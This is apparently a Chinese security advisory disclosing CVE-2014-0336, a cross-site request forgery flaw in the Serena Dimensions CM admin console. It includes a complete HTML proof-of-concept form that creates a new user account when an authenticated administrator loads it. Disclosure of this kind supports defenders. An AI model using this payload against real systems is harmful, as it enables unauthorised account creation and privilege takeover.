安全研究
安全漏洞
Serena Dimensions CM跨站请求伪造漏洞(CVE-2014-0336)
发布日期:2014-03-05
更新日期:2014-03-11
受影响系统:
SERENA Software Inc Serena Dimensions CM描述:
BUGTRAQ ID: 65981
CVE(CAN) ID: CVE-2014-0336
Serena Dimensions CM是基于进程的软件更改和配置管理解决方案。
Serena Dimensions CM 12.2 Build 7.199.0及其他版本的Web客户端存在跨站请求伪造漏洞,这可使远程攻击者通过adminconsole/ URI的 user_new_master 参数,利用该漏洞劫持管理员身份验证请求,获取管理员权限。
<*来源:Ken Cijsouw
链接:http://www.kb.cert.org/vuls/id/823452
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html>
<!-- CSRF PoC -->
<body>
<form
action="http://testhost:8080/adminconsole/?jsp=user_new_master&target=merant.adm.dimensions.objects.
User&create=yes" method="POST">
<input type="hidden" name="-AdmAttrNames.user_dept" value="" />
<input type="hidden" name="-AdmAttrNames.id" value="HACKTEST1" />
<input type="hidden" name="USER_CURWORKSET" value="%24GENERIC%3a%24GLOBAL" />
<input type="hidden" name="isUserEdit" value="false" />
<input type="hidden" name="-AdmAttrNames.user_site" value="" />
<input type="hidden" name="-AdmAttrNames.user_phone" value="" />
<input type="hidden" name="AUTOMATIC_LOGIN" value="" />
<input type="hidden" name="-AdmAttrNames.user_group_id" value="" />
<input type="hidden" name="null" value="" />
<input type="hidden" name="DIALOG_MODE" value="MODE%5fCREATE" />
<input type="hidden" name="-AdmAttrNames.user_full_name" value="HACKTEST1" />
<input type="hidden" name="projectPicker" value="%24GENERIC%3a%24GLOBAL" />
<input type="hidden" name="wait_until_loaded" value="" />
<input type="hidden" name="projectPickerUid" value="1" />
<input type="hidden" name="GROUPS_ASSIGNED" value="" />
<input type="hidden" name="-AdmAttrNames.email"
value="ken1%2ecijsouw%40sincerus%2enl" />
<input type="submit" value="Submit request" />
</form>
</body>
建议:
厂商补丁:
SERENA Software Inc
-------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.serena.com/index.php/en/products/featured-products/dimensions-cm/
参考:
http://cwe.mitre.org/data/definitions/79.html
http://cwe.mitre.org/data/definitions/352.html
http://www.serena.com/index.php/en/products/featured-products/dimensions-cm/
浏览次数:2331
严重程度:0(网友投票)
绿盟科技给您安全的保障